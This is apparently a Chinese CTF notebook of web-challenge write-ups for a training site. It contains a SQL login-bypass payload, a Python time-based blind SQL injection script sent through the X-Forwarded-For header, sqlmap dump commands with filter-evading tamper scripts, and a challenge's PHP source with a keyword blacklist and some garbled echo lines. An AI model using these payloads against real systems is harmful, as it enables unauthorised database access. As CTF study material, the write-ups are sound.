已经过滤了/ # -- select or union |
等,但是没有过滤单引号
payload:username=pcat'='&password=pcat'='
原sql语句为:
select * from user where username='用户名' and password='密码'
拼接后为:
select * from user where username='pcat'='' and password='pcat'=''
计算机首先计算username='pcat'
,返回为0(false),再计算0='',结果为1
最终语句等同于
select * from user where 1 and 1
即
select * from user
关于弱类型的比较:
以下情况都会为true
1='1'
1='1.0'
1='1后接字母(再后面有数字也可以)'
0='除了非0数字开头的字符串'
(总体上只要前面达成0的话,要使语句为true很简单,所以这题的万能密码只要按照我上面的法子去写一大把)
# -*- coding: utf-8 -*-
import requests
import time
# Candidate alphabet tried at every flag position (lowercase, digits, a few
# symbols); `flag` accumulates the characters confirmed by the timing oracle.
payloads = ''.join(('abcdefghijklmnopqrstuvwxyz', '0123456789', '@_.{}-'))
flag = str()
def exp(x, i):
    # Timing oracle for one (position, character) guess: returns 1 when the
    # request took more than 1 s, i.e. the injected sleep() fired, else 0.
    # x -- 1-based character position in the flag; i -- candidate character.
    # The injected string travels in X-FORWARDED-FOR; the script presumes the
    # target concatenates that header into a query (inferred from the payload,
    # not visible on this page). Any client-controlled header is untrusted
    # input and belongs in a bound parameter; SQL keywords inside a proxy
    # header are also a trivial WAF/log detection signature.
    starttime = time.time()
    url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
    xxx = "' or sleep(ascii(mid((select(flag)from(flag))from(" + str(x) + ")for(1)))=ascii('" + i + "')) and '1'='1"
    headers = {
        "Host": "ctf5.shiyanbar.com",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate",
        "Cookie": "PHPSESSID=oh30tdquhsp2ff227bgpj5eb02; Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1473428030,1473473503,1473553816,1473608536; Hm_lpvt_34d6f7353ab0915a4c582e4516dffbc3=1473608555; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*73570%2CnickName%3Ayiyang",
        "Connection": "keep-alive",
        "X-FORWARDED-FOR": xxx
    }
    # The response body is never inspected; elapsed wall-clock time is the
    # only signal (no timeout is set, so a stalled server blocks the loop).
    res = requests.get(url, headers=headers)
    s = time.time() - starttime;
    # Fixed 1 s threshold: network jitter above that yields a false positive
    # (a wrong character gets appended and never re-checked).
    if s > 1:
        return 1
    else:
        return 0
# Recover up to 32 flag characters, one position at a time: each candidate
# costs one request that sleeps ~1 s on a hit, so a full run is a long burst
# of slow requests from one client -- the traffic shape a rate limit or
# latency-anomaly alert would catch.
for x in range(1, 33):
    for i in payloads:
        if (exp(x, i)):
            flag += i
            print flag
            break   # first hit wins; remaining candidates are not tried
        else:
            pass    # miss: try the next candidate (a position with no hit is skipped silently)
print 'flag:' + flag
// error_reporting(0) silences every PHP warning/notice, including failures
// of the mysql_* calls below, so a broken query fails silently instead of
// surfacing in the error log.
error_reporting(0);
// Without both credentials posted, emit the form markup and stop.
// NOTE(review): the echo literals below look truncated by extraction
// (markup stripped, leaving '."\n"' fragments); not reconstructable here.
if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
echo '."
";
echo ''."
";
echo ''."
";
echo ''."
";
echo ''."
";
echo ''."
";
die;
}
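// Reject the request when $StrValue (a raw $_POST field, or its imploded
// elements when the field was posted as an array) matches the blacklist
// regex in $ArrReq. $StrKey is accepted for the caller's convenience but
// unused. This is an input blacklist, not a substitute for escaping or
// binding at the query itself.
function AttackFilter($StrKey,$StrValue,$ArrReq){
    if (is_array($StrValue)){
        $StrValue=implode($StrValue);
    }
    // $ArrReq is interpolated into the pattern unescaped: callers must pass a
    // trusted constant, never user input.
    $matched = preg_match("/".$ArrReq."/is",$StrValue);
    // preg_match() returns false on error (e.g. backtrack limit hit); the
    // original `== 1` treated that as "clean". Fail closed on anything but 0.
    if ($matched !== 0){
        print "水可载舟,亦可赛艇!";
        exit();
    }
}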
// Keyword blacklist applied to every POST field before any of it reaches SQL.
// Keyword blacklists are bypassable by construction (case, comment and
// encoding variants) and do not replace parameterised queries.
$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach (array_keys($_POST) as $key) {
    AttackFilter($key, $_POST[$key], $filter);
}
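$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
    die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
// Escape the untrusted POST value for this connection instead of interpolating
// it raw. The legacy mysql_* API has no prepared statements, so
// mysql_real_escape_string() is the minimum (it relies on the connection
// charset being set, e.g. via mysql_set_charset()); mysqli/PDO binding is the
// real fix. The keyword blacklist above does not make raw interpolation safe.
$uname = mysql_real_escape_string($_POST['uname'], $con);
$sql="SELECT * FROM interest WHERE uname = '{$uname}'";
$query = mysql_query($sql);
// A failed query returns false; treat it like "no such user" rather than
// passing false into mysql_num_rows().
if ($query && mysql_num_rows($query) == 1) {
    $key = mysql_fetch_array($query);
    // Strict comparison: loose `==` applies PHP type juggling (numeric-looking
    // strings are compared as numbers, e.g. '1' == '1.0'), so a pwd that is not
    // byte-equal to the stored value could still compare equal.
    if (is_string($_POST['pwd']) && (string)$key['pwd'] === $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "亦可赛艇!";
    }
}else{
    print "一颗赛艇!";
}
mysql_close($con);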
?>
http://blog.csdn.net/qq_34841823/article/details/54287419
直接sqlmap跑一遍就行
# Automated SQLi test of the id parameter, dumping table `flag` from database `web1`.
# Server side, the signature is one client sending hundreds of id= variants in
# quick succession; the fix is binding id as a query parameter.
python sqlmap.py -u 'http://ctf5.shiyanbar.com/web/index_3.php?id=1' --risk 3 --level 3 -D web1 -T flag --dump
过滤了空格间隔的关键字,采用tamper中的空格转化/**/的脚本绕过
# Same run with the space2comment tamper: spaces become /**/ (see the note
# above), so a filter keyed on space-delimited keywords never fires. Filters
# and WAF rules should normalise comments before matching; parameterisation
# removes the problem entirely.
python sqlmap.py -u 'http://ctf5.shiyanbar.com/web/index_2.php?id=1' --tamper space2comment.py --risk 3 --level 3 -D web1 -T flag --dump
过滤了关键字,采用tamper中的关键字前加注释的脚本绕过
# Same run with the halfversionedmorekeywords tamper: keywords are prefixed
# with a MySQL versioned comment (see the note above), which a plain keyword
# blacklist does not recognise. Inline comments in query parameters are a
# strong detection signal in their own right.
python sqlmap.py -u 'http://ctf5.shiyanbar.com/web/index_2.php?id=1' --tamper halfversionedmorekeywords.py --risk 3 --level 3 -D web1 -T flag --dump
通过脚本实现base64快速转换
import base64
import urllib2
import urllib
# Fetch the challenge page, read its FLAG response header (base64), keep the
# part after ':' of the decoded value, and POST it back as key=<value>. The
# note above calls this a "fast conversion" -- presumably the value is
# short-lived, hence a script rather than a manual round trip.
url = 'http://ctf5.shiyanbar.com/web/10/10.php'
req = urllib2.Request(url)
rsp = urllib2.urlopen(req)
flag = rsp.info().getheader('FLAG')   # None when the header is absent -> b64decode raises
flag = base64.b64decode(flag)
flag = flag.split(':')[1]             # IndexError when the decoded value has no ':'
print flag
data = urllib.urlencode({'key':flag})
req1 = urllib2.Request(url, data=data)  # supplying data= turns the request into a POST
rsp = urllib2.urlopen(req1).read()
print rsp
这个正在研究
在研究
编码绕过
'安女神' 转换为 '编码格式'
http://tool.chinaz.com/tools/unicode.aspx
请求表单中有个隐藏的传输参数showsource=0,改为1就会出现结果
查看源码
太累了,明天继续